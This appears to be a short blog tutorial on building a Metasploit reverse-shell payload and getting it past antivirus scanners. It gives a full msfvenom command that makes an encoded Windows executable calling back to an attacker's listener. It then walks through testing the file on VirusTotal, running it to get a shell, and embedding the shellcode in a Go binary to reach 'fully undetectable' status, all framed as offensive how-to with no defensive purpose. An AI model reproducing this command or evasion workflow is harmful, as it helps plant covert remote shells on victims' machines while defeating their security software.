Undetected Metasploit Payload – A payload in metapsloit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. Whether or not a payload is staged, is represented by ‘/’ in the payload name. For example, “windows/shell_bind_tcp” is a single payload with no stage, whereas “windows/shell/bind_tcp” consists of a stager (bind_tcp) and a stage (shell).
In this article, I don’t want to write too many words because I don’t want someone copy my article, translate it into another language, print it as a book and sell it for their own profit.
So, lets get started :
First, we need to build the payload using msfvenom :
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.6 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/plagiator.exe
and, scan it on VirusTotal.
At first I save it as 1.exe and here is the result :
Lets try to change the file name into plagiator.exe
Total AntiVirus engines are decresed by one. LOL..
So, We can learn from this case. An AntiVirus (Cybereason) does not want to get in touch with PLAGIARIST. So, become a plagiarist could help us to evade some security. LOL..
Next, lets try to run the payload in Windows machine to make sure that it can run properly. But before we run it, we have to setup Metasploit on our machine.
Next execute it on Windows machine and wait until we got the shell access.
Ok, our binary are loaded successfully. Now lets try to bypass some AV and hopefully get FUD.
We need to get the shellcode from the payload we used.
Now, lets execute the payload in memory directly by embedding the shellcode inside the binary. In this case i am using Golang to build the binary.
For a reference about how to run shellcode in binary, you can refer to this link.
Here is the scan result from virus total.
And finally, our Undetected Metasploit Payload is successfully created. Here is the result when i am combining the technique by using this AntiVirus Evasion Technique.
The lesson is:
if you want to become a GREAT PLAGIARIST,
you have to encrypt your f*ckin face.
Please Donate To Bitcoin Address: [[address]]